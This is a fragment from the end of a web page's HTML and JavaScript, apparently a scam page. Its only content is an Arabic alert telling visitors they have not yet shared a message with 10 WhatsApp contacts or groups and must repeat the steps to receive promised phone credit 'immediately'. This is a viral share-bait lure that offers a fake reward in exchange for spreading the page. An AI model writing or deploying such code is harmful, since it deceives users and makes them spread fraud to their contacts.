			else window.alert("للأسف لم تقم بنشر الرسالة لـ 10 اشخاص او مجموعات على الواتساب , نرجو بإعادة الخطوات بشكل صحيح لإرسال الرصيد فوراً" );
		});
});</script>

<!-- Script DOWN -->


</body>
<footer>
</html>